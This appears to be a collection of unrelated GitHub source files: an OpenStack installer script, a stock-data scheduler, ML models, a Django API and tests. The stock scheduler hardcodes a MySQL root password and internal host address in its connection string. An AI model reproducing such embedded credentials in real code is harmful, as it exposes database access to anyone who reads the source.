/etc/nova/nova.conf /etc/nova/nova.conf.org\",shell=True)\n    subprocess.call(\"cat nova.conf > /etc/nova/nova.conf && chmod 640 /etc/nova/nova.conf && chgrp nova /etc/nova/nova.conf\", shell=True)\n    subprocess.call(\"mv /etc/placement/placement.conf /etc/placement/placement.conf.org\",shell=True)\n    subprocess.call(\"cat placement.conf > /etc/placement/placement.conf\",shell=True)\n    subprocess.call(\"chmod 640 /etc/placement/placement.conf && chgrp placement /etc/placement/placement.conf\",shell=True)\n    # add_line expects a regex pattern, not a line number; anchor the\n    # inserted block on the closing VirtualHost tag of the placement vhost\n    add_line(\"/etc/httpd/conf.d/00-placement-api.conf\", r\"</VirtualHost>\", \"\"\"<Directory /usr/bin> \\n  Require all granted \\n </Directory>\\n \"\"\")\n    print(\"If SELinux is enabled, change policy.\")\n    subprocess.call(\"dnf --enablerepo=centos-openstack-victoria -y install openstack-selinux\", shell=True)\n    subprocess.call(\"semanage port -a -t http_port_t -p tcp 8778\", shell=True)\n    subprocess.call(\"checkmodule -m -M -o novaapi.mod novaapi.te\", shell=True)\n    subprocess.call(\"semodule_package --outfile novaapi.pp --module novaapi.mod\", shell=True)\n    subprocess.call(\"semodule -i novaapi.pp\", shell=True)\n    subprocess.call(\"firewall-cmd --add-port={6080/tcp,6081/tcp,6082/tcp,8774/tcp,8775/tcp,8778/tcp} --permanent\", shell=True)\n    subprocess.call(\"firewall-cmd --reload\", shell=True)\n    print(\"\"\" \tAdd data into the database and start Nova services. \\nThe \"deprecated ***\" messages printed while syncing the DB can be ignored. \"\"\")\n    subprocess.call(\"su -s /bin/bash placement -c 'placement-manage db sync'\", shell=True)\n    subprocess.call(\"\"\" su -s /bin/bash nova -c \"nova-manage api_db sync\" \"\"\", shell=True)\n    subprocess.call(\"\"\" su -s /bin/bash nova -c \"nova-manage cell_v2 map_cell0\" \"\"\", shell=True)\n    subprocess.call(\"\"\" su -s /bin/bash nova -c \"nova-manage db sync\" \"\"\", shell=True)\n    subprocess.call(\"\"\" su -s /bin/bash nova -c \"nova-manage cell_v2 create_cell --name cell1\" \"\"\", shell=True)\n    subprocess.call(\"\"\" systemctl restart httpd \"\"\", shell=True)\n    subprocess.call(\"\"\" chown placement. 
/var/log/placement/placement-api.log \"\"\", shell=True)\n subprocess.call(\"\"\" for service in api conductor scheduler novncproxy; do systemctl enable --now openstack-nova-$service; done \"\"\", shell=True)\n subprocess.call(\"\"\" openstack compute service list \"\"\", shell=True)\n setupKVM_func()\n subprocess.call(\"dnf --enablerepo=centos-openstack-victoria,epel,powertools -y install openstack-nova-compute\",shell=True)\n subprocess.call(\" dnf --enablerepo=centos-openstack-victoria -y install openstack-selinux\",shell=True)\n subprocess.call(\"firewall-cmd --add-port=5900-5999/tcp --permanent\",shell=True)\n subprocess.call(\"firewall-cmd --reload\",shell=True)\n print(\"Start Nova Compute.\")\n subprocess.call(\"systemctl enable --now openstack-nova-compute\",shell=True)\n subprocess.call(\"\"\" su -s /bin/bash nova -c \"nova-manage cell_v2 discover_hosts\" \"\"\", shell=True)\n subprocess.call(\"openstack compute service list\",shell=True)\n \n\n\n\n# subprocess.call(\"\", shell=True)\n# subprocess.call(\"\"\" \"\"\", shell=True)\n\n\ndef __main():\n checkOSInfo_func()\n checkDiskInfo_func()\n listFile_func()\n checkAllVariable_func()\n checkUser_func()\n getRequirements_func()\n prepareDB_func()\n setupKeystone_func()\n # configureGlance_func()\n # configureNova_func()\n # activeKeyston_func()\n # listFile_func()\n # checkUser_func()\n # subprocess.call(\"ls -al\",shell=True )\n # mariadbCheck_func()\n # getRequirements_func()\n # replace_line('/Users/hungnt/project/bash/op/py/dmhieu', 3,\"condihieu3\" )\n # add_line('/Users/hungnt/project/bash/op/py/dmhieu', \"abc\" ,\"condihieu2.7\")\n # prepareDB_func()\n # print(command)\n # print(\"openstack endpoint create --region RegionOne image public http://%s:9292\"%hostname_controller)\n # findAndReplace_func(\"glance-api.conf\",\"10.0.0.30\",\"CONTROLER_HOST\")\n print('SETUP COMPLETE')\n\nif __name__ == \"__main__\":\n __main()","repo_name":"hungnt612/OP-jits","sub_path":"py/op.py","file_name":"op.py","file_ext":"py","file_size_in_byte":19397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42726904218","text":"\"\"\"Hardware FonduerModel.\"\"\"\nimport pickle\n\nimport numpy as np\nfrom emmental.data import EmmentalDataLoader\nfrom pandas import DataFrame\n\nfrom fonduer.learning.dataset import FonduerDataset\nfrom fonduer.packaging import FonduerModel\nfrom fonduer.parser.models import Document\nfrom tests.shared.hardware_lfs import TRUE\nfrom tests.shared.hardware_utils import get_implied_parts\n\nATTRIBUTE = \"stg_temp_max\"\n\n\nclass HardwareFonduerModel(FonduerModel):\n \"\"\"Customized FonduerModel for hardware.\"\"\"\n\n def _classify(self, doc: Document) -> DataFrame:\n # Only one candidate class is used.\n candidate_class = self.candidate_extractor.candidate_classes[0]\n test_cands = getattr(doc, candidate_class.__tablename__ + \"s\")\n\n features_list = self.featurizer.apply(doc)\n # Convert features into a sparse matrix\n F_test = FonduerModel.convert_features_to_matrix(\n features_list[0], self.key_names\n )\n\n test_dataloader = EmmentalDataLoader(\n task_to_label_dict={ATTRIBUTE: \"labels\"},\n dataset=FonduerDataset(ATTRIBUTE, test_cands, F_test, self.word2id, 2),\n split=\"test\",\n batch_size=100,\n shuffle=False,\n )\n\n test_preds = self.emmental_model.predict(test_dataloader, return_preds=True)\n positive = np.where(np.array(test_preds[\"probs\"][ATTRIBUTE])[:, TRUE] > 0.7)\n true_preds = [test_cands[_] for _ in positive[0]]\n\n pickle_file = 
\"tests/data/parts_by_doc_dict.pkl\"\n with open(pickle_file, \"rb\") as f:\n parts_by_doc = pickle.load(f)\n\n df = DataFrame()\n for c in true_preds:\n part = c[0].context.get_span()\n doc = c[0].context.sentence.document.name.upper()\n val = c[1].context.get_span()\n for p in get_implied_parts(part, doc, parts_by_doc):\n entity_relation = (doc, p, val)\n df = df.append(\n DataFrame([entity_relation], columns=[\"doc\", \"part\", \"val\"])\n )\n return df\n","repo_name":"HazyResearch/fonduer","sub_path":"tests/shared/hardware_fonduer_model.py","file_name":"hardware_fonduer_model.py","file_ext":"py","file_size_in_byte":2063,"program_lang":"python","lang":"en","doc_type":"code","stars":395,"dataset":"github-code","pt":"53"} +{"seq_id":"75368647528","text":"from multiprocessing import Pool\nfrom sqlalchemy import create_engine\nfrom data_api.tushare_api import TushareApi\nimport sys\nimport os\nimport pandas as pd\nfrom loguru import logger\nimport schedule\nfrom time import sleep\nfrom tasks.basic import StockBasic\n\nlocation = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nlog_file_path = os.path.join(location,f'logs/daily_task.log')\nlogger.add(log_file_path,rotation=\"daily\", encoding=\"utf-8\", enqueue=True, retention=\"10 days\")\n\nstart = '20080103'\ncurPath = os.path.abspath(os.path.dirname(__file__))\nrootPath = os.path.split(curPath)[0]\nsys.path.append(rootPath)\nconn = create_engine(\n'mysql+pymysql://root:543049601a@192.168.61.158:33063/tushare')\n\nreset_dict = {'trade_date': '交易日期', 'buy_sm_vol': '小单买入量(手)',\n 'buy_sm_amount': '小单买入金额(万元)', 'sell_sm_vol': '小单卖出量(手)',\n 'sell_sm_amount': '小单卖出金额(万元)', 'buy_md_vol': '中单买入量(手)',\n 'buy_md_amount': '中单买入金额(万元)', 'sell_md_vol': '中单卖出量(手)',\n 'sell_md_amount': '中单卖出金额(万元)', 'buy_lg_vol': '大单买入量(手)',\n 'buy_lg_amount': '大单买入金额(万元)', 'sell_lg_vol': '大单卖出量(手)',\n 'sell_lg_amount': '大单卖出金额(万元)', 'buy_elg_vol': '特大单买入量(手)',\n 'buy_elg_amount': '特大单买入金额(万元)', 'sell_elg_vol': '特大单卖出量(手)',\n 'sell_elg_amount': '特大单卖出金额(万元)', 'net_mf_vol': '净流入量(手)',\n 'net_mf_amount': '净流入额(万元)', \"pct_change\": '涨跌幅', \"close\": '收盘价',\n 'change': '涨跌额', 'open': '开盘价', 'high': '最高价', 'low': '最低价', 'pre_close': '昨收价',\n 'vol_ratio': '成交量比', 'turn_over': '换手率', 'swing': '振幅', 'vol': '成交量',\n 'amount': '成交额', 'selling': '卖出量', 'buying': '买入量', 'strength': '强弱指数',\n 'activity': '活跃度', 'avg_turnover': '笔换手', 'attack': '攻击波', 'pe': '市盈率(动)',\n 'float_share': '流通股本(亿)', 'total_share': '总股本(亿)', 'total_assets': '总资产(亿)',\n 'liquid_assets': '流动资产(亿)', 'fixed_assets': '固定资产(亿)', 'reserved': '公积金',\n 'reserved_pershare': '每股公积金', 'eps': '每股收益', 'bvps': '每股净资产', 'pb': '市净率',\n 'undp': '未分配利润', 'per_undp': '每股未分配利润', 'rev_yoy': '收入同比(%)',\n 'profit_yoy': '利润同比(%)', 'gpr': '毛利率(%)', 'npr': '净利润率(%)',\n 'holder_num': '股东人数', 'his_low': '历史最低', 'his_high': '历史最高', 'cost_5pct': '5分位成本',\n 'cost_15pct': '15分位成本', 'cost_50pct': '50分位成本', 'cost_85pct': '85分位成本', 'cost_95pct': '95分位成本',\n 'weight_avg': '加权平均成本', 'winner_rate': '胜率', 'price': '成本价格', 'percent': '价格占比(%)', 'chip_distribute': '筹码分布(价格,占比)'}\n\n\n\n\nclass Daily(StockBasic):\n def __init__(self):\n StockBasic.__init__(self)\n \n def get_single_daily_normal(self, ts_code, trade_date):\n stock_daily = self.tushare.get_stock_daily(ts_code, trade_date)\n advanced_info = self.tushare.get_stock_advanced_info(\n ts_code, trade_date)\n moneyflow = self.tushare.get_stock_moneyflow(ts_code, trade_date)\n chip_winrate = self.tushare.get_chip_winrate(ts_code, trade_date)\n chip_distribute = 
self.tushare.get_chip_distribution(\n            ts_code, trade_date)[self.now_date]\n        # factor = self.tushare.get_factor(ts_code, trade_date)\n\n        sum = {}\n        sum.update(stock_daily[ts_code])\n        sum.update(advanced_info[ts_code])\n        sum.update(moneyflow[ts_code])\n        sum.update(chip_winrate[ts_code])\n        # sum.update(factor[ts_code])\n        sum = self.tushare.reset_dict_key(sum, reset_dict)\n        sum['筹码分布(价格,占比)'] = str(chip_distribute)\n        del sum['未知']\n        return sum\n\n\ndaily = Daily()\n\n# Fetch the current day's data (runs on the daily 19:00 schedule)\n@logger.catch\ndef run_normal(code,date=None):\n    if date:\n        trade_time = date\n    else:\n        trade_time = daily.get_now_date()\n    table_name = daily.get_table_name(code)\n    df = pd.DataFrame.from_dict([daily.get_single_daily_normal(code, trade_time)])\n    df.to_sql(table_name, conn, if_exists='append', index=False)\n    logger.info('{}||time:{}||update finished'.format(table_name, trade_time))\n\ndef daily_task():\n    if daily.check_trade_date():\n        p = Pool(3)\n        for code in daily.all_ts_code:\n            p.apply_async(run_normal, args=(code,))\n        p.close()\n        p.join()\n\ndef handle_task(date):\n    p = Pool(3)\n    for code in daily.all_ts_code:\n        p.apply_async(run_normal, args=(code, date))\n    p.close()\n    p.join()\n\ndef run_first(ts_code,table_name):\n\n    print('Initializing table for {}'.format(ts_code))\n    conn = create_engine(\n'mysql+pymysql://root:543049601a@192.168.61.158:33063/tushare')\n    mock_data = {'交易日期': '19900101', '涨跌幅': -1.3, '收盘价': 12.12, '涨跌额': -0.16, \n    '开盘价': 12.25, '最高价': 12.25, '最低价': 11.99, '昨收价': 12.28, '成交量比': 0.9, \n    '换手率': 0.51, '振幅': 2.12, '成交量': 991260.0, '成交额': 119755.57, '卖出量': 494426.0, \n    '买入量': 496834.0, '强弱指数': -1.63, '活跃度': 4544.0, '笔换手': 0.0, '攻击波': 1.08, \n    '市盈率(动)': 4.03, '流通股本(亿)': 194.06, '总股本(亿)': 194.06, '总资产(亿)': 54558.97, \n    '流动资产(亿)': 0.0, '固定资产(亿)': 106.81, '公积金': 807.56, '每股公积金': 4.16, '每股收益': 0.65, \n    '每股净资产': 19.42, '市净率': 0.62, '未分配利润': 1988.26, '每股未分配利润': 10.25, '收入同比(%)': -2.4, \n    '利润同比(%)': 13.63, '毛利率(%)': 40.73, '净利润率(%)': 32.38, '股东人数': 506867, '小单买入量(手)': 286971, \n    '小单买入金额(万元)': 34654.51, '小单卖出量(手)': 196225, '小单卖出金额(万元)': 23717.76, \n    '中单买入量(手)': 320683, '中单买入金额(万元)': 38725.2, '中单卖出量(手)': 303389, '中单卖出金额(万元)': 36670.68, \n    '大单买入量(手)': 257749, '大单买入金额(万元)': 31160.33, '大单卖出量(手)': 305641, '大单卖出金额(万元)': 36926.51, \n    '特大单买入量(手)': 125858, '特大单买入金额(万元)': 15215.53, '特大单卖出量(手)': 186005, \n    '特大单卖出金额(万元)': 22440.62, '净流入量(手)': -93510, '净流入额(万元)': -11203.89, '历史最低': 0.31, \n    '历史最高': 24.79, '5分位成本': 8.23, '15分位成本': 11.83, '50分位成本': 13.03, '85分位成本': 17.59, '95分位成本': 21.91, \n    '加权平均成本': 13.92, '胜率': 20.14, '成本价格': 24.79, '价格占比(%)': 0.05, '筹码分布(价格,占比)': '[[0.31, 0.04],[0.55,0.04]]'}\n    a = pd.DataFrame.from_dict([mock_data])\n    a.to_sql(table_name, conn, if_exists='replace', index=False)\n
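\n# run_first() is defined above but never called anywhere in this script. A hypothetical\n# one-off initialization pass, reusing daily.all_ts_code and get_table_name from this\n# module, could look like:\n#     for code in daily.all_ts_code:\n#         run_first(code, daily.get_table_name(code))\n# Note that run_first() replaces the target table with a single mock row.\n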
\n\nif __name__ == \"__main__\":\n    schedule.every().day.at(\"19:00\").do(daily_task)\n    task_no = int(input(\"Enter task number (1: daily task, 2: manual task): \"))\n    if task_no == 1:\n        while True:\n            schedule.run_pending()\n            sleep(1)\n    elif task_no == 2:\n        date = input(\"Enter date: \")\n        handle_task(date)\n","repo_name":"jsntcheng/new_trader_miao","sub_path":"tasks/daily.py","file_name":"daily.py","file_ext":"py","file_size_in_byte":8104,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"30889516175","text":"import os\nfrom datetime import date\n\nfrom kaleidoscope import reader\n\n\ndef test_read_gallery(testing_gallery):\n    \"\"\"Reader should properly read metadata of the gallery.\"\"\"\n    gallery = reader.read_gallery(str(testing_gallery))\n    assert gallery.title == \"Hello World\"\n    assert gallery.author == \"Me\"\n    assert len(gallery.albums) == 2\n\n\ndef test_skipping_nonalbum_dirs(testing_gallery):\n    \"\"\"Directories without album.ini should be skipped\"\"\"\n    testing_gallery.mkdir('not-album')\n    gallery = reader.read_gallery(str(testing_gallery))\n    assert len(gallery.albums) == 2\n\n\ndef test_read_album(testing_gallery):\n    album_dir = str(testing_gallery.join(\"testing-album\"))\n    album = reader.read_album(album_dir)\n    assert album.name == \"testing-album\"\n    assert album.title == \"Testing Album\"\n    assert album.date == date(2017, 5, 15)\n    assert len(album.sections) == 1\n    assert album.sections[0].name == \"photos\"\n\n\ndef test_read_incomplete_album_info(testing_gallery):\n    \"\"\"If album name and date are not specified, reader should derive them\n    from directory properties.\n    \"\"\"\n    album_dir = str(testing_gallery.join(\"incomplete-album\"))\n    album = reader.read_album(album_dir)\n    assert album.name == \"incomplete-album\"\n    assert album.title == \"incomplete-album\"\n    assert album.date == date.today()\n\n\ndef test_read_photos(testing_gallery):\n    album_dir = str(testing_gallery.join(\"testing-album\"))\n    album = reader.read_album(album_dir)\n    expected_photos = [\n        (\"Photo1.jpg\", \"\", \"\"),\n        (\"Photo2.jpg\", \"Caption\", \"Caption\"),\n        (\"Photo3.jpg\", \"Long caption\", \"Long caption\"),\n        (\"Photo4.jpg\", \"Long caption\", \"Long caption with hidden part\")\n    ]\n    for photo, (name, short_caption, long_caption) in \\\n            zip(album.sections[0].photos, expected_photos):\n        assert photo.name == name\n        assert photo.short_caption == short_caption\n        assert photo.long_caption == long_caption\n        assert photo.source_path == os.path.join(album_dir, name)\n","repo_name":"sergejx/kaleidoscope","sub_path":"tests/test_reader.py","file_name":"test_reader.py","file_ext":"py","file_size_in_byte":2026,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"29941436325","text":"def hola_mundo():\n    print('Hello, this is a function')\n\n\nhola_mundo()\n\n\ndef multiplicar(valor, valor_2=90):\n    print(valor * valor_2)\n\nmultiplicar(10, 55)\n\nnumero = 100\nnumero_2 = 50\n\nmultiplicar(numero)\n\n\ndef sumar_numeros(lista):\n    total = 0\n    for i in lista:\n        if i < 11:\n            total += i\n\n    print(total)\n
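\n# Worked example: with the list below, sumar_numeros prints 42\n# (10 + 5 + 10 + 8 + 9); the 55 is skipped because only values under 11 are summed.\n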
\nlista_numeros = [10, 5, 10, 8, 9, 55]\n\nsumar_numeros(lista_numeros)\n\n\ndef agregar(lista, numero):\n    lista.append(numero)\n    print(lista)\n\nagregar(lista_numeros, 'hello world')\n\nprint(lista_numeros)","repo_name":"MauriRubioJob/PrepClass-Python-JS","sub_path":"Python_Basic_Examples_For_Classes/Basic_Class_Alvaro/Clase 3/Ejemplos/funciones.py","file_name":"funciones.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"40577241759","text":"from log import log\nimport sys\n\nfrom django.http import HttpResponse, JsonResponse, QueryDict\nfrom django.conf import settings\n\nfrom api.models import Audio, Sentence\nfrom api.auth import auth_user_id, auth_directory_id, auth_note_id, auth_audio_id, auth_sentence_id_shared, auth_sentence_id_edit\nfrom api.utils import coerce_to_post\nfrom api.es_client.es_client import es\n\n@auth_sentence_id_shared\ndef get_sentence_info(request):\n    sentence_id = int(request.GET.get('sentence_id'))\n    sentence = Sentence.objects.get(id=sentence_id)\n\n    json_res = dict()\n    json_res['audio_id'] = sentence.audio.id\n    json_res['index'] = sentence.index\n    json_res['started_at'] = sentence.started_at\n    json_res['ended_at'] = sentence.ended_at\n    json_res['content'] = sentence.content\n\n    return JsonResponse(json_res)\n\n@auth_audio_id\ndef create_sentence(request):\n    index = int(request.POST.get('index'))\n    audio_id = int(request.POST.get('audio_id'))\n    started_at = int(request.POST.get('started_at'))\n    ended_at = int(request.POST.get('ended_at'))\n    content = str(request.POST.get('content'))\n    audio = Audio.objects.get(id=audio_id)\n    user_id = audio.user.id\n\n    sentence = Sentence.objects.create(\n        index=index,\n        audio_id=audio_id,\n        user_id=user_id,\n        started_at=started_at,\n        ended_at=ended_at,\n        content=content\n    )\n\n    json_res = dict()\n    json_res['sentence_id'] = sentence.id\n\n    # elasticsearch document create\n    es_document = dict()\n    es_document['sentence_id'] = sentence.id\n    es_document['note_id'] = audio.note.id\n    es_document['user_id'] = audio.user.id\n    es_document['content'] = sentence.content\n    es.create(index='sentence', body=es_document, id=sentence.id)\n\n    return JsonResponse(json_res, status=201)\n\n@auth_sentence_id_shared\n@auth_sentence_id_edit\ndef update_sentence(request):\n    coerce_to_post(request)\n\n    sentence_id = int(request.PUT.get('sentence_id'))\n    content = str(request.PUT.get('content'))\n    sentence = Sentence.objects.get(id=sentence_id)\n\n    sentence.content = content\n    sentence.save()\n\n    # elasticsearch document update\n    es_document = dict()\n    es_document['content'] = sentence.content\n    es.update(index='sentence', body={'doc':es_document}, id=sentence.id)\n\n    return HttpResponse(status=200)\n\n@auth_sentence_id_shared\n@auth_sentence_id_edit\ndef delete_sentence(request):\n    coerce_to_post(request)\n\n    sentence_id = int(request.DELETE.get('sentence_id'))\n    sentence = Sentence.objects.get(id=sentence_id)\n\n    sentence.delete()\n\n    # elasticsearch document delete\n    es.delete(index='sentence', id=sentence_id)\n\n    return HttpResponse(status=200)\n\n@log\ndef api_note_sentence(request):\n    try:\n        if request.method == 'GET':\n            return get_sentence_info(request)\n        elif request.method == 'POST':\n            return create_sentence(request)\n        elif request.method == 'PUT':\n            return update_sentence(request)\n        elif request.method == 'DELETE':\n            return delete_sentence(request)\n        else:\n            return HttpResponse(status=405)\n    except Exception:\n        print(\"Unexpected error:\", sys.exc_info()[0])\n        return HttpResponse(status=400)","repo_name":"sjy366/lisn-django-api-server","sub_path":"api/views/views_sentence.py","file_name":"views_sentence.py","file_ext":"py","file_size_in_byte":3244,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
{"seq_id":"72282273769","text":"def solution(s): # even if s is ~100,000 chars long, there are only about 500 tuples\n    answer = []\n\n    tuple_list = []\n    num = \"\"\n    num_list = []\n    openStatus = True\n    for i in range(len(s)-1):\n        c = s[i]\n        if c.isdigit():\n            num += c\n        if c == \",\" and openStatus:\n            num_list.append(int(num))\n            num = \"\"\n        elif c == \"{\": openStatus = True\n        elif c == \"}\":\n            num_list.append(int(num))\n            num = \"\"\n            openStatus = False\n            tuple_list.append(num_list)\n            num_list = []\n    # print(tuple_list) #[[1, 2, 3], [2, 1], [1, 2, 4, 3], [2]]\n\n    tuples = set()\n    for length in range(1,len(tuple_list)+1): # 1~4\n        for number_set in tuple_list:\n            if len(number_set) == length:\n                for num in number_set:\n                    if num not in tuples:\n                        answer.append(num)\n                        tuples.add(num)\n    return answer\n","repo_name":"yoo-myeong/Myeongorithm","sub_path":"python/프로그래머스_튜플.py","file_name":"프로그래머스_튜플.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"12053009068","text":"#! /usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport time\n\nimport tensorflow as tf\n\nfrom libs.utils.mnist import *\n\n__author__ = 'fyabc'\n\n\n# Constants.\nDisplayFreq = 100\nTrainIteration = 20000\nBatchSize = 50\n\n\n# Initializers.\n\ndef weight_variable(shape):\n    return tf.Variable(tf.truncated_normal(shape, stddev=0.1))\n\n\ndef bias_variable(shape):\n    # [NOTE] Use a slightly positive initial bias to avoid \"dead neurons\".\n    return tf.Variable(tf.constant(0.1, shape=shape))\n\n\n# Convolutional layers.\n\ndef conv2d(x, W):\n    return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')\n\n\ndef max_pool_2x2(x):\n    return tf.nn.max_pool(x, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')\n\n\ndef main():\n    # Get MNIST dataset.\n    mnist = input_data.read_data_sets('MNIST_data/', one_hot=True)\n\n    x, y_ = input_placeholders()\n\n    # First convolutional layer\n\n    # Weight shape: (patch_width, patch_height, input_channels, output_channels)\n    # Bias shape: (output_channels,)\n    W_conv1 = weight_variable([5, 5, 1, 32])\n    b_conv1 = bias_variable([32])\n\n    # x_image shape: (data_case, image_width, image_height, color_channels)\n    x_image = tf.reshape(x, [-1, 28, 28, 1])\n\n    h_conv1 = tf.nn.relu(conv2d(x_image, W_conv1) + b_conv1)\n    h_pool1 = max_pool_2x2(h_conv1)\n\n    # Second convolutional layer\n\n    W_conv2 = weight_variable([5, 5, 32, 64])\n    b_conv2 = bias_variable([64])\n\n    h_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2) + b_conv2)\n    h_pool2 = max_pool_2x2(h_conv2)\n\n    # Densely connected layer\n    # Reduced image size: 7 * 7, hidden size: 1024\n
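    # Shape check: each SAME-padded conv keeps the spatial size and each 2x2 max-pool\n    # halves it, so 28x28 -> pool -> 14x14 -> pool -> 7x7; with 64 output channels the\n    # flattened feature vector has 7 * 7 * 64 entries, which fixes W_fc1's first dimension.\n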
    W_fc1 = weight_variable([7 * 7 * 64, 1024])\n    b_fc1 = bias_variable([1024])\n\n    h_pool2_flat = tf.reshape(h_pool2, [-1, 7 * 7 * 64])\n    h_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1) + b_fc1)\n\n    # Dropout\n    keep_prob = tf.placeholder(floatX)\n    h_fc1_drop = tf.nn.dropout(h_fc1, keep_prob)\n\n    # Readout layer\n    W_fc2 = weight_variable([1024, 10])\n    b_fc2 = bias_variable([10])\n\n    y_conv = tf.matmul(h_fc1_drop, W_fc2) + b_fc2\n\n    # Train and evaluate model\n    cross_entropy = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y_, logits=y_conv))\n    train_step = tf.train.AdamOptimizer(1e-4).minimize(cross_entropy)\n    correct_prediction = tf.equal(tf.argmax(y_conv, 1), tf.argmax(y_, 1))\n    accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\n    with tf.Session() as sess:\n        sess.run(tf.global_variables_initializer())\n\n        # Summary\n        summary_writer = tf.summary.FileWriter('./output/deep_mnist_logs', sess.graph)\n\n        start_time = time.time()\n\n        for i 
in range(TrainIteration):\n batch = mnist.train.next_batch(BatchSize)\n if i % DisplayFreq == 0:\n train_accuracy = accuracy.eval(feed_dict={\n x: batch[0], y_: batch[1], keep_prob: 1.0})\n print('Step %d, time %.2fs, training accuracy %.4f' % (i, time.time() - start_time, train_accuracy))\n train_step.run(feed_dict={x: batch[0], y_: batch[1], keep_prob: 0.5})\n\n print('Test accuracy %.4f' % accuracy.eval(feed_dict={\n x: mnist.test.images, y_: mnist.test.labels, keep_prob: 1.0}))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"fyabc/Toys","sub_path":"LearnTensorFlow/deep_mnist.py","file_name":"deep_mnist.py","file_ext":"py","file_size_in_byte":3238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7816213332","text":"from abc import ABC, abstractmethod\nfrom typing import Dict, Tuple\n\nimport torch\nfrom torch import nn, Tensor\nfrom torch.nn import Parameter\n\nfrom src.models.gcn import MetaDenseGCN\nfrom src.models.sampling import Sampler\nfrom src.utils.graph import (get_triu_values, triu_values_to_symmetric_matrix, is_square_matrix, cosine_similarity)\nfrom src.utils.tracking import setup_basic_logger\n\nlogger = setup_basic_logger()\n\n\nclass ParameterClamper(object):\n def __call__(self, module):\n for param in module.parameters():\n w = param.data\n w.clamp_(0.0, 1.0)\n\n\nclass GraphGenerativeModel(nn.Module, ABC):\n\n def __init__(self, sample_undirected: bool = True, *args, **kwargs):\n super(GraphGenerativeModel, self).__init__(*args, **kwargs)\n self.sample_undirected = sample_undirected\n\n def sample(self, *args, **kwargs) -> Tensor:\n probs = self.forward()\n edges = Sampler.sample(probs)\n return edges\n\n def project_parameters(self):\n pass\n\n def refine(self):\n logger.warn(f\"Model called to refine current parameters but method is not implemented. 
Ignore...\")\n\n @abstractmethod\n def statistics(self) -> Dict[str, float]:\n pass\n\n\nclass BernoulliGraphModel(GraphGenerativeModel):\n\n def __init__(self, init_matrix: Tensor, directed: bool = False):\n \"\"\"\n :param directed:\n :param init_matrix: Either symmetric matrix or flattened\n array of the values of the upper triangular matrix\n \"\"\"\n super(BernoulliGraphModel, self).__init__()\n assert is_square_matrix(init_matrix)\n\n self.directed = directed\n self.orig_matrix = init_matrix\n\n # Init Values\n probs = init_matrix if directed else get_triu_values(init_matrix)\n self.probs = Parameter(probs, requires_grad=True)\n\n def project_parameters(self):\n self.apply(ParameterClamper())\n\n def forward(self, *args, **kwargs) -> torch.Tensor:\n return self.probs if self.directed else triu_values_to_symmetric_matrix(self.probs) # type: ignore\n\n def statistics(self) -> Dict[str, float]:\n sample = self.forward()\n n_edges = sample.size(0) ** 2\n return {\n \"expected_num_edges\": sample.sum().item(),\n \"percentage_edges_expected\": sample.sum().item() / n_edges,\n \"mean_prob\": torch.mean(self.probs).item(),\n \"min_prob\": torch.min(self.probs).item(),\n \"max_prob\": torch.max(self.probs).item()\n }\n\n\nclass PairwiseEmbeddingSampler(GraphGenerativeModel):\n\n def __init__(self,\n n_nodes: int,\n embedding_dim: int,\n prob_pow: float = 1.0,\n init_bounds: float = 0.001):\n super(PairwiseEmbeddingSampler, self).__init__()\n self.embeddings = Parameter(torch.empty((n_nodes, embedding_dim)), requires_grad=True)\n self.prob_pow = prob_pow\n self.n_edges = n_nodes ** 2\n self.init_bounds = init_bounds\n\n self.reset_embeddings()\n\n def reset_embeddings(self):\n self.embeddings.data.uniform_(-self.init_bounds, self.init_bounds)\n\n def forward(self, *args, **kwargs) -> Tensor:\n return torch.sigmoid(self.embeddings @ self.embeddings.t()) ** self.prob_pow\n\n def sample(self, *args, **kwargs) -> Tensor:\n edge_probs = self.forward()\n edges = Sampler.sample(edge_probs, embeddings=self.embeddings)\n return edges\n\n def statistics(self) -> Dict[str, float]:\n probs = self.forward()\n return {\n \"expected_num_edges\": probs.sum().item(),\n \"percentage_edges_expected\": probs.sum().item() / self.n_edges\n }\n\n\nclass GraphProposalNetwork(GraphGenerativeModel):\n\n def __init__(self,\n features: Tensor,\n dense_adj: Tensor,\n dropout: float = 0.0,\n add_original: bool = False,\n embedding_dim: int = 128,\n probs_bias_init: float = 0.0,\n probs_factor_init: float = 1.0,\n prob_power: float = 1.0,\n use_sigmoid: bool = True,\n use_tanh: bool = False,\n normalize_similarities: bool = False\n ):\n super(GraphProposalNetwork, self).__init__()\n\n assert features.size(0) == dense_adj.size(0)\n assert is_square_matrix(dense_adj)\n assert not (use_sigmoid and use_tanh)\n assert probs_factor_init > 0.0\n\n self.original_features = features\n self.original_adj = dense_adj\n\n self.features = features\n self.adj = dense_adj\n self.n_edges = dense_adj.size(0) * dense_adj.size(1)\n self.num_features = features.size(1)\n self.add_original = add_original\n self.prob_power = prob_power\n self.use_sigmoid = use_sigmoid\n self.use_tanh = use_tanh\n self.normalize_similarities = normalize_similarities\n self.gcn = MetaDenseGCN(in_features=self.num_features,\n hidden_features=embedding_dim * 2,\n out_features=embedding_dim,\n dropout=dropout)\n\n self.probs_factor = Parameter(torch.tensor(probs_factor_init), requires_grad=True)\n self.probs_bias = Parameter(torch.tensor(probs_bias_init), 
